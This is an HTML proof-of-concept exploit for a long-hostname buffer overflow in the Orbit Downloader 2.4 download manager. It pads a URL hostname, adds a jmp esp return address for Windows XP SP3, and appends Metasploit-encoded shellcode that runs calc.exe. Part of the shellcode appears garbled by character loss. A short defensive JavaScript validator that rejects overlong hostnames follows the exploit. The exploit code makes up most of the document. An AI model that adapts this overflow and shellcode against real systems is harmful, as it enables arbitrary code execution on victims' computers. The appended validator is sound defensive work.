<html>
<body>
Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability PoC<br />
Vulnerability discovered by Secunia<br />
Exploit and POC provided by: JavaGuru<br />
<br />
Right click on link below then choose download by orbit, CALC.EXE will pop up<br />
<br />
I had a lot of problems when trying to execute shellcode, because a lot of chars<br />
were forbidden and I was not able to execute shellcode.<br />
After playing a little I found out the solution.<br />
<br />
Don't forget, open this HTML in Firefox
<br />
Check it out.<br />
<br />
Any questions/comments: JavaGuru1999@yahoo.de<br />
<br />
<script language="JavaScript">
var tmp = "http://";
// Pad the hostname with 508 filler characters
for (var i = 0; i < 508; i++) tmp += "o";
// jmp esp from kernel32.dll XP SP 3 English
//
tmp += "{F?|";
// some nops
tmp += "????";
// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
tmp += "?YYYY?YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY?????7IIIIIIIIIIIIIIIIIQZjgXP0B1ABkBAw2BB2AA0AAXBP8BBum9IlKX74C030wpnksuUlnkalfePxTAJOlKboVxLKQOEpUQzK1Ynk6TLKS1jNEaO0Z9LlndIP44UWjaKzfm5QkrjKl4UkADDdvdsEZELKsoWTGqjK0flKtL0KlKSo7lGqZKnkwllK4AJKK9QLDdTDzc7AO0AtlKCpvPLEO00xfllK70dLlK0peLlmLKCX6hxkuYnkopNPUPUPUPNku8UlCoFQyfcPpVLIl8k3o0ak2pqxankhzBCCqxZ8kNmZvnpWiom7rCU10lpcvNperXPes0g";
// Filename (not important)
tmp += "/a.rar";
// Write link for download for orbit!
document.write('<a href="' + tmp + '">Right click, then choose download with orbit</a>');
</script>
</body>
</html>
[2009-02-27]
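Added example (not part of the original PoC and not Orbit's code): the link above carries a hostname far longer than DNS allows (253 characters per name, 63 per label), so a download handler or proxy can reject such a URL before the hostname is copied into any buffer. The function names `extractHost` and `vetUrl` and the sample URLs are constructed for illustration.

```javascript
// DNS limits: 253 characters for a full name, 63 for a single label.
const MAX_HOST = 253;
const MAX_LABEL = 63;

// Pull the host out of the authority by hand, so that a malformed URL is
// inspected as received rather than rejected or normalised by a URL parser.
function extractHost(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/?#]*)/i.exec(url);
  if (!m) return null;                       // not an absolute URL
  let host = m[1];
  const at = host.lastIndexOf("@");          // drop userinfo, if any
  if (at !== -1) host = host.slice(at + 1);
  if (host.startsWith("[")) return host;     // IPv6 literal, left untouched
  return host.replace(/:\d*$/, "");          // drop port
}

// Return the reasons a URL should be refused (empty array = acceptable).
function vetUrl(url) {
  const host = extractHost(url);
  if (host === null || host === "") return ["no hostname"];
  if (host.startsWith("[")) return [];
  const reasons = [];
  if (host.length > MAX_HOST) {
    reasons.push(`hostname is ${host.length} chars, limit ${MAX_HOST}`);
  }
  const labels = host.replace(/\.$/, "").split(".");
  if (labels.some((l) => l.length > MAX_LABEL)) {
    reasons.push(`label longer than ${MAX_LABEL} chars`);
  }
  if (labels.some((l) => l.length === 0)) reasons.push("empty label");
  // Assumption: IDN names are converted to punycode before this check.
  if (/[^\x21-\x7e]/.test(host)) reasons.push("byte outside printable ASCII");
  return reasons;
}

// Constructed sample URLs: one ordinary, one with a 600-character host.
const samples = [
  "http://example.com/a.rar",
  "http://" + "o".repeat(600) + "/a.rar",
];
for (const u of samples) {
  const r = vetUrl(u);
  console.log(u.slice(0, 30), r.length ? "REJECT: " + r.join("; ") : "ok");
}
```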